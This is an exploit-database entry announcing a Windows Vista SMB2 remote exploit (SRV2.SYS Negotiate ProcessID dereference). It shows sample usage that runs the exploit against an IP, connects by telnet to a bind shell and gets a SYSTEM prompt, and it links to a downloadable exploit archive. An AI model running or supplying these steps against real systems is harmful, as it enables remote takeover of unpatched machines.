Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

[Dragos]

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

---------------------------------------------------------------------

Exploited by Piotr Bania // [: www.piotrbania.com :]

Exploit for Vista SP2/SP1 only, should be reliable!

Tested on:

Vista sp2 (6.0.6002.18005)

Vista sp1 ultimate (6.0.6001.18000)

Kudos for:

Stephen, HDM, Laurent Gaffie(bug) and all the mates i know, peace.

Special kudos for prdelka for testing this shit and all the hosters.

Sample usage

------------

> smb2_exploit.exe 192.167.0.5 45 0

> telnet 192.167.0.5 28876

Microsoft Windows [Version 6.0.6001]

Copyright © 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami

whoami

nt authority\system

C:\Windows\system32>

When all is done it should spawn a port TARGET_IP:28876

RELEASE UPDATE 08/2010:

----------------------

This exploit was created almost a year ago and wasnt modified from that time

whatsoever. The vulnerability itself is patched for a long time already so

i have decided to release this little exploit. You use it for your own

responsibility and im not responsible for any potential damage this thing

can cause. Finally i don't care whether it worked for you or not.

P.S the technique itself is described here:

Metasploit: SMB2: 351 Packets from the Trampoline

===========================================================================

Download:

http://www.exploit-db.com/sploits/smb2_exploit_release.zip